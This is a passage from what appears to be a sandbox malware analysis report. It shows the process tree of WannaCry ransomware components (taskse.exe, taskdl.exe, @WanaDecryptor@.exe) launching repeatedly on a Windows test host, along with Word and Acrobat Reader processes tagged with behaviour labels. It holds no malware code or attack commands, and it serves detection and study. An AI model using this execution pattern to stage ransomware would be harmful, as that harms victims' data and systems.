                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1292
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                        taskdl.exe
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1932
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4684
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                            @WanaDecryptor@.exe
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3964
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                              taskdl.exe
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3724
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:392
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4604
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                    taskdl.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3952
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2144
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                        @WanaDecryptor@.exe
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1720
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                          taskdl.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4208
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1320
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                              @WanaDecryptor@.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:752
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                taskdl.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3112
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3060
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:1228
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                      taskdl.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5024
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3464
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2644
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                            taskdl.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1792
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3816
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:2092
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                  taskdl.exe
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4704
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:3068
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                        taskdl.exe
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4824
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3268
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                            @WanaDecryptor@.exe
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5068
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                              taskdl.exe
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:4216
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3996
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                  @WanaDecryptor@.exe
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4412
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                                    taskdl.exe
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4692
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1136
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                        @WanaDecryptor@.exe
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1436
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                                          taskdl.exe
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1936
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3640
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                              @WanaDecryptor@.exe
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4480
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                                                taskdl.exe
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3136
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1180
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4844
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                                                                                                      taskdl.exe
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5024
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3480
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:3680
                                                                                                                                                                                                                                      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "C:\Users\Admin\Desktop\WaitComplete.dot"
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:3128
                                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 472 -p 1684 -ip 1684
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4088
                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 1684 -s 856
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          PID:388
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\SyncDebug.pdf"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                          PID:4864
                                                                                                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                            PID:3336
                                                                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B202015575BDFB04FA74E626DD8D4639 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4352
                                                                                                                                                                                                                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=04237CA605D615F877456891C55FF5FF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=04237CA605D615F877456891C55FF5FF --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4356
                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=233E37E609EA0376B04FB3FBF4507AA5 --mojo-platform-channel-handle=2164 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:752
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9686B6FAC4BDB62AC026762C37DDD897 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3628
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5919B45AD53F28F027DB472B98F3BB01 --mojo-platform-channel-handle=1696 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3724
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=96235CD327C3D23A58F8FA73CEAD17D5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=96235CD327C3D23A58F8FA73CEAD17D5 --renderer-client-id=8 --mojo-platform-channel-handle=1920 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:2804
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\SyncDebug.pdf"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                      PID:4356
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D2A5BEE3D259F90B603419951F5246A9 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:2676
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6CC124069D9479811AEC04116688457D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6CC124069D9479811AEC04116688457D --renderer-client-id=2 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4436
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C3055CDF7166CAA60D04889C1FAA7316 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:2952
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
